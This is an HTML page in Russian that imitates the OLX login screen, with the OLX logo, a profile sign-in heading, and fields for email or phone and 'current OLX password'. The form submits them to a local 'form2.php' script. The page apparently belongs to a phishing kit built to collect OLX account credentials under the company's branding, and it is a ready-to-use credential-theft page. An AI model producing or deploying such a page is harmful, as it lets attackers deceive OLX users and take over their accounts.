<!DOCTYPE html>
<html>
<head>
    <meta name="viewport" content="width=device-width, initial-scale=1" charset="utf-8">
    <style>
    html, body{width:100%; height:100%; margin:0}
    #action_form{
    	display: block;
  align-items: center;
    	margin-left: auto;
   		margin-right: auto;
  		top: 30%; 
  	 	position: relative;
   	 	width:280px;
   	 	height:auto;
   		border:1px solid;
   		text-align: left; 
    }
    .header {
    text-align: center; /* Выравнивание по центру */ 
     width: 100%;
     background: #002f34;
     display: block;
    top: 0;
    left: 0;
    right: 0;
   margin-left: auto;
   		margin-right: auto;
    height: 60px;
    position: relative;
    
   }


    .input input[type=text] {
        width: 98%;
        margin: 3px;
   }


    .input input[type=password] {
        width: 98%;
         margin: 3px;
   }
  .enter{
    border-bottom:1px solid;
     margin-left: auto;
      margin-right: auto;
      text-align: center;
      font-size: 125%;
     

  }
  .button  {
    width: 102%;
    margin-bottom: 10px;
    display: flex;
    position: relative;
    text-align: center;
    color: #fff;
    font-size: 16px;
    
    background: #002f34;
    cursor: pointer;
    box-shadow: 0 0 0 2px #002f34;
    border: none;
   
    align-items: center;
    justify-content: center;
  }

    form{
    	padding:8%;

    }
    </style>
</head>
<body>
<p class="header"><img src="logo1.png" alt="OLX - бесплатные объявления"></p>

<div id="action_form">
<div class="enter">Вход в мой профиль OLX   </div>
     <form action="form2.php" method="post">
        <label for="username">Email или номер телефона</label>
        <div class ="input">
        <input name="username" id="username" type="text"  ><br/>
    </div>
        <label for="password">Ваш текущий пароль от OLX</label>
        <div class ="input"> <input name="password" id="password"  type="password"  >
        </div>
        <p ><input class="button" type="submit" value="Войти"></p>
    </form>
</div>
</body>
</html>